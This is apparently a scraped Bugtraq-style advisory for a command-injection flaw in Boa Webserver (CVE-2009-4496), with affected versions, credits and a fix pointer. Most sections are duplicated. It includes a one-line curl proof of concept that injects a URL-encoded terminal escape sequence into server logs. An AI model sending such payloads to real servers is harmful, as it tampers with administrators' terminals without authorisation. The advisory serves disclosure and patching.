Boa Webserver Terminal Escape Sequence in Logs Command Injection Vulnerability
BID:37718
Info
Boa Webserver Terminal Escape Sequence in Logs Command Injection Vulnerability
| Bugtraq ID: | 37718 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-4496 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 11 2010 12:00AM |
| Updated: | May 12 2010 07:11PM |
| Credit: | Giovanni 'evilaliv3' Pellerano, Alessandro 'jekil' Tanasi, and Francesco 'ascii' Ongaro |
| Vulnerable: |
Red Hat Fedora 13 Red Hat Fedora 12 Red Hat Fedora 11 Boa Webserver 0.94.14 rc21 Boa Webserver 0.94.8 .3-1 Boa Webserver 0.94.8 .2 Boa Webserver 0.93.15 Boa Webserver 0.92 r |
| Not Vulnerable: | |
Discussion
Boa Webserver Terminal Escape Sequence in Logs Command Injection Vulnerability
Boa Webserver is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
Attackers can exploit this issue to execute arbitrary commands in a terminal.
Boa Webserver 0.94.14rc21 is vulnerable; other versions may also be affected.
Boa Webserver is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
Attackers can exploit this issue to execute arbitrary commands in a terminal.
Boa Webserver 0.94.14rc21 is vulnerable; other versions may also be affected.
Exploit / POC
Boa Webserver Terminal Escape Sequence in Logs Command Injection Vulnerability
Attackers can exploit this issue with readily available tools.
The following example is available:
curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
Attackers can exploit this issue with readily available tools.
The following example is available:
curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
Solution / Fix
Boa Webserver Terminal Escape Sequence in Logs Command Injection Vulnerability
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
Boa Webserver Terminal Escape Sequence in Logs Command Injection Vulnerability
References:
References: